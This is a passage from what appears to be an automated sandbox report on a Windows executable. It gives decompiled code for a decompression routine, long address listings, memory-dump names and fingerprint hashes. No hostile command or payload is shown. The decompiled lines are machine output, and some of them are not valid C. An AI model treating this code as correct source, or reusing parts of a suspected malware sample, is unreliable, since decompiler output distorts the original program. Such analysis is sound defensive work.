							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							L56:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1a;
								goto L170;
							}
							__ecx =  *(__ebp - 0x68);
							__al =  *(__ebp - 0x5c);
							__edx =  *(__ebp - 8);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
							 *( *(__ebp - 0x68)) = __al;
							__ecx =  *(__ebp - 0x14);
							 *(__ecx +  *(__ebp - 8)) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t192 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t192;
							goto L79;
						case 0x1b:
							goto L75;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = _t414;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}













                                            0x00000000
                                            0x00406520
                                            0x00406520
                                            0x00406524
                                            0x004065db
                                            0x004065de
                                            0x004065ea
                                            0x004064cb
                                            0x004064cb
                                            0x004064ce
                                            0x00406840
                                            0x00406840
                                            0x00406843
                                            0x00406843
                                            0x00406849
                                            0x0040684f
                                            0x00406855
                                            0x0040686f
                                            0x00406872
                                            0x00406878
                                            0x00406883
                                            0x00406885
                                            0x00406857
                                            0x00406857
                                            0x00406866
                                            0x0040686a
                                            0x0040686a
                                            0x0040688f
                                            0x004068b6
                                            0x004068b6
                                            0x004068bc
                                            0x004068bc
                                            0x00000000
                                            0x00406891
                                            0x00406891
                                            0x00406895
                                            0x00406a44
                                            0x00000000
                                            0x00406a44
                                            0x004068a1
                                            0x004068a8
                                            0x004068b0
                                            0x004068b3
                                            0x00000000
                                            0x004068b3
                                            0x0040652a
                                            0x0040652e
                                            0x00406a6f
                                            0x00406a6f
                                            0x00406a72
                                            0x00406a76
                                            0x00406a76
                                            0x00406534
                                            0x0040653a
                                            0x0040653d
                                            0x00406541
                                            0x00406544
                                            0x00406548
                                            0x00406a0e
                                            0x00406a5a
                                            0x00406a62
                                            0x00406a69
                                            0x00406a6b
                                            0x00000000
                                            0x00406a6b
                                            0x0040654e
                                            0x00406551
                                            0x00406557
                                            0x00406559
                                            0x00406559
                                            0x0040655c
                                            0x0040655f
                                            0x00406562
                                            0x00406565
                                            0x00406568
                                            0x0040656b
                                            0x0040656c
                                            0x0040656e
                                            0x0040656e
                                            0x0040656e
                                            0x00406571
                                            0x00406574
                                            0x00406577
                                            0x0040657a
                                            0x0040657a
                                            0x0040657d
                                            0x0040657f
                                            0x0040657f
                                            0x00406582
                                            0x00406582
                                            0x00406582
                                            0x00406058
                                            0x00406058
                                            0x00406061
                                            0x00000000
                                            0x00000000
                                            0x00406067
                                            0x00000000
                                            0x00406072
                                            0x00000000
                                            0x00000000
                                            0x0040607b
                                            0x0040607e
                                            0x00406081
                                            0x00406085
                                            0x00000000
                                            0x00000000
                                            0x0040608b
                                            0x0040608e
                                            0x00406090
                                            0x00406091
                                            0x00406094
                                            0x00406096
                                            0x00406097
                                            0x00406099
                                            0x0040609c
                                            0x004060a1
                                            0x004060a6
                                            0x004060af
                                            0x004060c2
                                            0x004060c5
                                            0x004060d1
                                            0x004060f9
                                            0x004060fb
                                            0x00406109
                                            0x00406109
                                            0x0040610d
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x004060fd
                                            0x004060fd
                                            0x00406100
                                            0x00406101
                                            0x00406101
                                            0x00000000
                                            0x004060fd
                                            0x004060d7
                                            0x004060dc
                                            0x004060dc
                                            0x004060e5
                                            0x004060ed
                                            0x004060f0
                                            0x00000000
                                            0x004060f6
                                            0x004060f6
                                            0x00000000
                                            0x004060f6
                                            0x00000000
                                            0x00406113
                                            0x00406113
                                            0x00406117
                                            0x004069c3
                                            0x00000000
                                            0x004069c3
                                            0x00406120
                                            0x00406130
                                            0x00406133
                                            0x00406136
                                            0x00406136
                                            0x00406136
                                            0x00406139
                                            0x0040613d
                                            0x00000000
                                            0x00000000
                                            0x0040613f
                                            0x00406145
                                            0x0040616f
                                            0x00406175
                                            0x0040617c
                                            0x00000000
                                            0x0040617c
                                            0x0040614b
                                            0x0040614e
                                            0x00406153
                                            0x00406153
                                            0x0040615e
                                            0x00406166
                                            0x00406169
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x004061ae
                                            0x004061b4
                                            0x004061b7
                                            0x004061c4
                                            0x004061cc
                                            0x00000000
                                            0x00000000
                                            0x00406183
                                            0x00406183
                                            0x00406187
                                            0x004069d2
                                            0x00000000
                                            0x004069d2
                                            0x00406193
                                            0x0040619e
                                            0x0040619e
                                            0x0040619e
                                            0x004061a1
                                            0x004061a4
                                            0x004061a7
                                            0x004061ac
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x004061d4
                                            0x004061d6
                                            0x004061d9
                                            0x0040624a
                                            0x0040624d
                                            0x00406250
                                            0x00406257
                                            0x00406261
                                            0x00000000
                                            0x00406261
                                            0x004061db
                                            0x004061df
                                            0x004061e2
                                            0x004061e4
                                            0x004061e7
                                            0x004061ea
                                            0x004061ec
                                            0x004061ef
                                            0x004061f1
                                            0x004061f6
                                            0x004061f9
                                            0x004061fc
                                            0x00406200
                                            0x00406207
                                            0x0040620a
                                            0x00406211
                                            0x00406215
                                            0x0040621d
                                            0x0040621d
                                            0x0040621d
                                            0x00406217
                                            0x00406217
                                            0x00406217
                                            0x0040620c
                                            0x0040620c
                                            0x0040620c
                                            0x00406221
                                            0x00406224
                                            0x00406242
                                            0x00406244
                                            0x00000000
                                            0x00406226
                                            0x00406226
                                            0x00406229
                                            0x0040622c
                                            0x0040622f
                                            0x00406231
                                            0x00406231
                                            0x00406231
                                            0x00406234
                                            0x00406237
                                            0x00406239
                                            0x0040623a
                                            0x0040623d
                                            0x00000000
                                            0x0040623d
                                            0x00000000
                                            0x00406473
                                            0x00406477
                                            0x00406495
                                            0x00406498
                                            0x0040649f
                                            0x004064a2
                                            0x004064a5
                                            0x004064a8
                                            0x004064ab
                                            0x004064ae
                                            0x004064b0
                                            0x004064b7
                                            0x004064b8
                                            0x004064ba
                                            0x004064bd
                                            0x004064c0
                                            0x004064c3
                                            0x004064c3
                                            0x004064c8
                                            0x00000000
                                            0x004064c8
                                            0x00406479
                                            0x0040647c
                                            0x0040647f
                                            0x00406489
                                            0x00000000
                                            0x00000000
                                            0x004064dd
                                            0x004064e1
                                            0x00406504
                                            0x00406507
                                            0x0040650a
                                            0x00406514
                                            0x004064e3
                                            0x004064e3
                                            0x004064e6
                                            0x004064e9
                                            0x004064ec
                                            0x004064f9
                                            0x004064fc
                                            0x004064fc
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00406591
                                            0x00406595
                                            0x0040659c
                                            0x0040659f
                                            0x004065a2
                                            0x004065ac
                                            0x00000000
                                            0x004065ac
                                            0x00406597
                                            0x00000000
                                            0x00000000
                                            0x004065b8
                                            0x004065bc
                                            0x004065c3
                                            0x004065c6
                                            0x004065c9
                                            0x004065be
                                            0x004065be
                                            0x004065be
                                            0x004065cc
                                            0x004065cf
                                            0x004065d2
                                            0x004065d2
                                            0x004065d5
                                            0x004065d8
                                            0x00000000
                                            0x00000000
                                            0x00406678
                                            0x00406678
                                            0x0040667c
                                            0x00406a1a
                                            0x00000000
                                            0x00406a1a
                                            0x00406682
                                            0x00406685
                                            0x00406688
                                            0x0040668c
                                            0x0040668f
                                            0x00406695
                                            0x00406697
                                            0x00406697
                                            0x00406697
                                            0x0040669a
                                            0x0040669d
                                            0x00000000
                                            0x00000000
                                            0x0040626d
                                            0x0040626d
                                            0x00406271
                                            0x004069de
                                            0x00000000
                                            0x004069de
                                            0x00406277
                                            0x0040627a
                                            0x0040627d
                                            0x00406281
                                            0x00406284
                                            0x0040628a
                                            0x0040628c
                                            0x0040628c
                                            0x0040628c
                                            0x0040628f
                                            0x00406292
                                            0x00406292
                                            0x00406295
                                            0x00406298
                                            0x00000000
                                            0x00000000
                                            0x0040629e
                                            0x004062a4
                                            0x00000000
                                            0x00000000
                                            0x004062aa
                                            0x004062aa
                                            0x004062ae
                                            0x004062b1
                                            0x004062b4
                                            0x004062b7
                                            0x004062ba
                                            0x004062bb
                                            0x004062be
                                            0x004062c0
                                            0x004062c6
                                            0x004062c9
                                            0x004062cc
                                            0x004062cf
                                            0x004062d2
                                            0x004062d5
                                            0x004062d8
                                            0x004062f4
                                            0x004062f7
                                            0x004062fa
                                            0x004062fd
                                            0x00406304
                                            0x00406308
                                            0x0040630a
                                            0x0040630e
                                            0x004062da
                                            0x004062da
                                            0x004062de
                                            0x004062e6
                                            0x004062eb
                                            0x004062ed
                                            0x004062ef
                                            0x004062ef
                                            0x00406311
                                            0x00406318
                                            0x0040631b
                                            0x00000000
                                            0x00406321
                                            0x00000000
                                            0x00406321
                                            0x00000000
                                            0x00406326
                                            0x00406326
                                            0x0040632a
                                            0x004069ea
                                            0x00000000
                                            0x004069ea
                                            0x00406330
                                            0x00406333
                                            0x00406336
                                            0x0040633a
                                            0x0040633d
                                            0x00406343
                                            0x00406345
                                            0x00406345
                                            0x00406345
                                            0x00406348
                                            0x0040634b
                                            0x0040634b
                                            0x0040634b
                                            0x00406351
                                            0x00000000
                                            0x00000000
                                            0x00406353
                                            0x00406356
                                            0x00406359
                                            0x0040635c
                                            0x0040635f
                                            0x00406362
                                            0x00406365
                                            0x00406368
                                            0x0040636b
                                            0x0040636e
                                            0x00406371
                                            0x00406389
                                            0x0040638c
                                            0x0040638f
                                            0x00406392
                                            0x00406392
                                            0x00406395
                                            0x00406399
                                            0x0040639b
                                            0x00406373
                                            0x00406373
                                            0x0040637b
                                            0x00406380
                                            0x00406382
                                            0x00406384
                                            0x00406384
                                            0x0040639e
                                            0x004063a5
                                            0x004063a8
                                            0x00000000
                                            0x004063aa
                                            0x00000000
                                            0x004063aa
                                            0x004063a8
                                            0x004063af
                                            0x004063af
                                            0x004063af
                                            0x004063af
                                            0x00000000
                                            0x00000000
                                            0x004063ea
                                            0x004063ea
                                            0x004063ee
                                            0x004069f6
                                            0x00000000
                                            0x004069f6
                                            0x004063f4
                                            0x004063f7
                                            0x004063fa
                                            0x004063fe
                                            0x00406401
                                            0x00406407
                                            0x00406409
                                            0x00406409
                                            0x00406409
                                            0x0040640c
                                            0x0040640f
                                            0x0040640f
                                            0x00406415
                                            0x004063b3
                                            0x004063b3
                                            0x004063b6
                                            0x00000000
                                            0x004063b6
                                            0x00406417
                                            0x00406417
                                            0x0040641a
                                            0x0040641d
                                            0x00406420
                                            0x00406423
                                            0x00406426
                                            0x00406429
                                            0x0040642c
                                            0x0040642f
                                            0x00406432
                                            0x00406435
                                            0x0040644d
                                            0x00406450
                                            0x00406453
                                            0x00406456
                                            0x00406456
                                            0x00406459
                                            0x0040645d
                                            0x0040645f
                                            0x00406437
                                            0x00406437
                                            0x0040643f
                                            0x00406444
                                            0x00406446
                                            0x00406448
                                            0x00406448
                                            0x00406462
                                            0x00406469
                                            0x0040646c
                                            0x00000000
                                            0x0040646e
                                            0x00000000
                                            0x0040646e
                                            0x00000000
                                            0x004066fb
                                            0x004066fb
                                            0x004066ff
                                            0x00406a26
                                            0x00000000
                                            0x00406a26
                                            0x00406705
                                            0x00406708
                                            0x0040670b
                                            0x0040670f
                                            0x00406712
                                            0x00406718
                                            0x0040671a
                                            0x0040671a
                                            0x0040671a
                                            0x0040671d
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0040680a
                                            0x0040680e
                                            0x00406830
                                            0x00406833
                                            0x0040683d
                                            0x00000000
                                            0x0040683d
                                            0x00406810
                                            0x00406813
                                            0x00406817
                                            0x0040681a
                                            0x0040681a
                                            0x0040681d
                                            0x00000000
                                            0x00000000
                                            0x004068c7
                                            0x004068cb
                                            0x004068e9
                                            0x004068e9
                                            0x004068e9
                                            0x004068f0
                                            0x004068f7
                                            0x004068fe
                                            0x004068fe
                                            0x00000000
                                            0x004068fe
                                            0x004068cd
                                            0x004068d0
                                            0x004068d3
                                            0x004068d6
                                            0x004068dd
                                            0x00406821
                                            0x00406821
                                            0x00406824
                                            0x00000000
                                            0x00000000
                                            0x004069b8
                                            0x004069bb
                                            0x00000000
                                            0x00000000
                                            0x004065f2
                                            0x004065f4
                                            0x004065fb
                                            0x004065fc
                                            0x004065fe
                                            0x00406601
                                            0x00000000
                                            0x00000000
                                            0x00406609
                                            0x0040660c
                                            0x0040660f
                                            0x00406611
                                            0x00406613
                                            0x00406613
                                            0x00406614
                                            0x00406617
                                            0x0040661e
                                            0x00406621
                                            0x0040662f
                                            0x00000000
                                            0x00000000
                                            0x00406905
                                            0x00406905
                                            0x00406908
                                            0x0040690f
                                            0x00000000
                                            0x00000000
                                            0x00406914
                                            0x00406914
                                            0x00406918
                                            0x00406a50
                                            0x00000000
                                            0x00406a50
                                            0x0040691e
                                            0x00406921
                                            0x00406924
                                            0x00406928
                                            0x0040692b
                                            0x00406931
                                            0x00406933
                                            0x00406933
                                            0x00406933
                                            0x00406936
                                            0x00406939
                                            0x00406939
                                            0x00406939
                                            0x00406939
                                            0x0040693c
                                            0x0040693c
                                            0x00406940
                                            0x004069a0
                                            0x004069a3
                                            0x004069a8
                                            0x004069a9
                                            0x004069ab
                                            0x004069ad
                                            0x004069b0
                                            0x00000000
                                            0x004069b0
                                            0x00406942
                                            0x00406948
                                            0x0040694b
                                            0x0040694e
                                            0x00406951
                                            0x00406954
                                            0x00406957
                                            0x0040695a
                                            0x0040695d
                                            0x00406960
                                            0x00406963
                                            0x0040697c
                                            0x0040697f
                                            0x00406982
                                            0x00406985
                                            0x00406989
                                            0x0040698b
                                            0x0040698b
                                            0x0040698c
                                            0x0040698f
                                            0x00406965
                                            0x00406965
                                            0x0040696d
                                            0x00406972
                                            0x00406974
                                            0x00406977
                                            0x00406977
                                            0x00406992
                                            0x00406999
                                            0x00000000
                                            0x0040699b
                                            0x00000000
                                            0x0040699b
                                            0x00000000
                                            0x00406637
                                            0x0040663a
                                            0x00406670
                                            0x004067a0
                                            0x004067a0
                                            0x004067a0
                                            0x004067a0
                                            0x004067a3
                                            0x004067a3
                                            0x004067a6
                                            0x004067a8
                                            0x00406a32
                                            0x00000000
                                            0x00406a32
                                            0x004067ae
                                            0x004067b1
                                            0x00000000
                                            0x00000000
                                            0x004067b7
                                            0x004067bb
                                            0x004067be
                                            0x004067be
                                            0x004067be
                                            0x00000000
                                            0x004067be
                                            0x0040663c
                                            0x0040663e
                                            0x00406640
                                            0x00406642
                                            0x00406645
                                            0x00406646
                                            0x00406648
                                            0x0040664a
                                            0x0040664d
                                            0x00406650
                                            0x00406666
                                            0x0040666b
                                            0x004066a3
                                            0x004066a3
                                            0x004066a7
                                            0x004066d3
                                            0x004066d5
                                            0x004066dc
                                            0x004066df
                                            0x004066e2
                                            0x004066e2
                                            0x004066e7
                                            0x004066e7
                                            0x004066e9
                                            0x004066ec
                                            0x004066f3
                                            0x004066f6
                                            0x00406723
                                            0x00406723
                                            0x00406726
                                            0x00406729
                                            0x0040679d
                                            0x0040679d
                                            0x0040679d
                                            0x00000000
                                            0x0040679d
                                            0x0040672b
                                            0x00406731
                                            0x00406734
                                            0x00406737
                                            0x0040673a
                                            0x0040673d
                                            0x00406740
                                            0x00406743
                                            0x00406746
                                            0x00406749
                                            0x0040674c
                                            0x00406765
                                            0x00406767
                                            0x0040676a
                                            0x0040676b
                                            0x0040676e
                                            0x00406770
                                            0x00406773
                                            0x00406775
                                            0x00406777
                                            0x0040677a
                                            0x0040677c
                                            0x0040677f
                                            0x00406783
                                            0x00406785
                                            0x00406785
                                            0x00406786
                                            0x00406789
                                            0x0040678c
                                            0x0040674e
                                            0x0040674e
                                            0x00406756
                                            0x0040675b
                                            0x0040675d
                                            0x00406760
                                            0x00406760
                                            0x0040678f
                                            0x00406796
                                            0x00406720
                                            0x00406720
                                            0x00406720
                                            0x00406720
                                            0x00000000
                                            0x00406798
                                            0x00000000
                                            0x00406798
                                            0x00406796
                                            0x004066a9
                                            0x004066ac
                                            0x004066ae
                                            0x004066b1
                                            0x004066b4
                                            0x004066b7
                                            0x004066b9
                                            0x004066bc
                                            0x004066bf
                                            0x004066bf
                                            0x004066c2
                                            0x004066c2
                                            0x004066c5
                                            0x004066cc
                                            0x004066a0
                                            0x004066a0
                                            0x004066a0
                                            0x004066a0
                                            0x00000000
                                            0x004066ce
                                            0x00000000
                                            0x004066ce
                                            0x004066cc
                                            0x00406652
                                            0x00406655
                                            0x00406657
                                            0x0040665a
                                            0x00000000
                                            0x00000000
                                            0x004063b9
                                            0x004063b9
                                            0x004063bd
                                            0x00406a02
                                            0x00000000
                                            0x00406a02
                                            0x004063c3
                                            0x004063c6
                                            0x004063c9
                                            0x004063cc
                                            0x004063cf
                                            0x004063d2
                                            0x004063d5
                                            0x004063d7
                                            0x004063da
                                            0x004063dd
                                            0x004063e0
                                            0x004063e2
                                            0x004063e2
                                            0x004063e2
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x004067c1
                                            0x004067c1
                                            0x004067c1
                                            0x004067c5
                                            0x00000000
                                            0x00000000
                                            0x004067cb
                                            0x004067ce
                                            0x004067d1
                                            0x004067d4
                                            0x004067d6
                                            0x004067d6
                                            0x004067d6
                                            0x004067d9
                                            0x004067dc
                                            0x004067df
                                            0x004067e2
                                            0x004067e5
                                            0x004067e8
                                            0x004067e9
                                            0x004067eb
                                            0x004067eb
                                            0x004067eb
                                            0x004067ee
                                            0x004067f1
                                            0x004067f4
                                            0x004067f7
                                            0x004067fa
                                            0x004067fe
                                            0x00406800
                                            0x00406803
                                            0x00000000
                                            0x00406805
                                            0x00000000
                                            0x00406805
                                            0x00406803
                                            0x00406a38
                                            0x00000000
                                            0x00000000
                                            0x00406067

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.248853069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.248849693.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248859062.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248866383.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248879905.0000000000422000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248885504.000000000042A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248890779.000000000042D000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7dec09a748792e581ac56a4790c1b6395b646ad41e7ca9f7da80e9268b46833e
                                            • Instruction ID: 178f069459afe4b8f6f8f854f87fc4d5347ab2ec506c5a0858b6a976d85c5aaa
                                            • Opcode Fuzzy Hash: 7dec09a748792e581ac56a4790c1b6395b646ad41e7ca9f7da80e9268b46833e
                                            • Instruction Fuzzy Hash: 8E816871E00228CFDF24DFA8C8447ADBBB1FB45301F25816AD816BB281C7785A96DF44
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00406025, Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 98%
                                            			E00406025(void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v95;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				void _v140;
				void* _v148;
				signed int _t537;
				signed int _t538;
				signed int _t572;

				_t572 = 0x22;
				_v148 = __ecx;
				memcpy( &_v140, __ecx, _t572 << 2);
				if(_v52 == 0xffffffff) {
					return 1;
				}
				while(1) {
					L3:
					_t537 = _v140;
					if(_t537 > 0x1c) {
						break;
					}
					switch( *((intOrPtr*)(_t537 * 4 +  &M00406A77))) {
						case 0:
							__eflags = _v112;
							if(_v112 == 0) {
								goto L173;
							}
							_v112 = _v112 - 1;
							_v116 = _v116 + 1;
							_t537 =  *_v116;
							__eflags = _t537 - 0xe1;
							if(_t537 > 0xe1) {
								goto L174;
							}
							_t542 = _t537 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t576);
							_push(9);
							_pop(_t577);
							_t622 = _t542 / _t576;
							_t544 = _t542 % _t576 & 0x000000ff;
							asm("cdq");
							_t617 = _t544 % _t577 & 0x000000ff;
							_v64 = _t617;
							_v32 = (1 << _t622) - 1;
							_v28 = (1 << _t544 / _t577) - 1;
							_t625 = (0x300 << _t617 + _t622) + 0x736;
							__eflags = 0x600 - _v124;
							if(0x600 == _v124) {
								L12:
								__eflags = _t625;
								if(_t625 == 0) {
									L14:
									_v76 = _v76 & 0x00000000;
									_v68 = _v68 & 0x00000000;
									goto L17;
								} else {
									goto L13;
								}
								do {
									L13:
									_t625 = _t625 - 1;
									__eflags = _t625;
									 *((short*)(_v8 + _t625 * 2)) = 0x400;
								} while (_t625 != 0);
								goto L14;
							}
							__eflags = _v8;
							if(_v8 != 0) {
								GlobalFree(_v8);
							}
							_t537 = GlobalAlloc(0x40, 0x600); // executed
							__eflags = _t537;
							_v8 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								_v124 = 0x600;
								goto L12;
							}
						case 1:
							L15:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 1;
								goto L173;
							}
							_v112 = _v112 - 1;
							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
							_v116 = _v116 + 1;
							_t50 =  &_v76;
							 *_t50 = _v76 + 1;
							__eflags =  *_t50;
							L17:
							__eflags = _v76 - 4;
							if(_v76 < 4) {
								goto L15;
							}
							_t550 = _v68;
							__eflags = _t550 - _v120;
							if(_t550 == _v120) {
								L22:
								_v76 = 5;
								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
								goto L25;
							}
							__eflags = _v12;
							_v120 = _t550;
							if(_v12 != 0) {
								GlobalFree(_v12); // executed
							}
							_t537 = GlobalAlloc(0x40, _v68); // executed
							__eflags = _t537;
							_v12 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								goto L22;
							}
						case 2:
							L26:
							_t557 = _v100 & _v32;
							_v136 = 6;
							_v80 = _t557;
							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
							goto L135;
						case 3:
							L23:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 3;
								goto L173;
							}
							_v112 = _v112 - 1;
							_t72 =  &_v116;
							 *_t72 = _v116 + 1;
							__eflags =  *_t72;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L25:
							_v76 = _v76 - 1;
							__eflags = _v76;
							if(_v76 != 0) {
								goto L23;
							}
							goto L26;
						case 4:
							L136:
							_t559 =  *_t626;
							_t610 = _t559 & 0x0000ffff;
							_t591 = (_v20 >> 0xb) * _t610;
							__eflags = _v16 - _t591;
							if(_v16 >= _t591) {
								_v20 = _v20 - _t591;
								_v16 = _v16 - _t591;
								_v68 = 1;
								_t560 = _t559 - (_t559 >> 5);
								__eflags = _t560;
								 *_t626 = _t560;
							} else {
								_v20 = _t591;
								_v68 = _v68 & 0x00000000;
								 *_t626 = (0x800 - _t610 >> 5) + _t559;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L142;
							} else {
								goto L140;
							}
						case 5:
							L140:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 5;
								goto L173;
							}
							_v20 = _v20 << 8;
							_v112 = _v112 - 1;
							_t464 =  &_v116;
							 *_t464 = _v116 + 1;
							__eflags =  *_t464;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L142:
							_t561 = _v136;
							goto L143;
						case 6:
							__edx = 0;
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v56 = 1;
								_v136 = 7;
								__esi = _v8 + 0x180 + _v60 * 2;
								goto L135;
							}
							__eax = _v96 & 0x000000ff;
							__esi = _v100;
							__cl = 8;
							__cl = 8 - _v64;
							__esi = _v100 & _v28;
							__eax = (_v96 & 0x000000ff) >> 8;
							__ecx = _v64;
							__esi = (_v100 & _v28) << 8;
							__ecx = _v8;
							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
							__eflags = _v60 - 4;
							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							if(_v60 >= 4) {
								__eflags = _v60 - 0xa;
								if(_v60 >= 0xa) {
									_t103 =  &_v60;
									 *_t103 = _v60 - 6;
									__eflags =  *_t103;
								} else {
									_v60 = _v60 - 3;
								}
							} else {
								_v60 = 0;
							}
							__eflags = _v56 - __edx;
							if(_v56 == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L63;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__ecx = _v12;
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							_v95 =  *((intOrPtr*)(__eax + __ecx));
							goto L43;
						case 7:
							__eflags = _v68 - 1;
							if(_v68 != 1) {
								__eax = _v40;
								_v132 = 0x16;
								_v36 = _v40;
								__eax = _v44;
								_v40 = _v44;
								__eax = _v48;
								_v44 = _v48;
								__eax = 0;
								__eflags = _v60 - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								_v60 = (__eflags >= 0) - 1 + 0xa;
								__eax = _v8;
								__eax = _v8 + 0x664;
								__eflags = __eax;
								_v92 = __eax;
								goto L71;
							}
							__eax = _v8;
							__ecx = _v60;
							_v136 = 8;
							__esi = _v8 + 0x198 + _v60 * 2;
							goto L135;
						case 8:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xa;
								__esi = _v8 + 0x1b0 + _v60 * 2;
							} else {
								__eax = _v60;
								__ecx = _v8;
								__eax = _v60 + 0xf;
								_v136 = 9;
								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
							}
							goto L135;
						case 9:
							__eflags = _v68;
							if(_v68 != 0) {
								goto L92;
							}
							__eflags = _v100;
							if(_v100 == 0) {
								goto L174;
							}
							__eax = 0;
							__eflags = _v60 - 7;
							_t264 = _v60 - 7 >= 0;
							__eflags = _t264;
							0 | _t264 = _t264 + _t264 + 9;
							_v60 = _t264 + _t264 + 9;
							goto L78;
						case 0xa:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xb;
								__esi = _v8 + 0x1c8 + _v60 * 2;
								goto L135;
							}
							__eax = _v44;
							goto L91;
						case 0xb:
							__eflags = _v68;
							if(_v68 != 0) {
								__ecx = _v40;
								__eax = _v36;
								_v36 = _v40;
							} else {
								__eax = _v40;
							}
							__ecx = _v44;
							_v40 = _v44;
							L91:
							__ecx = _v48;
							_v48 = __eax;
							_v44 = _v48;
							L92:
							__eax = _v8;
							_v132 = 0x15;
							__eax = _v8 + 0xa68;
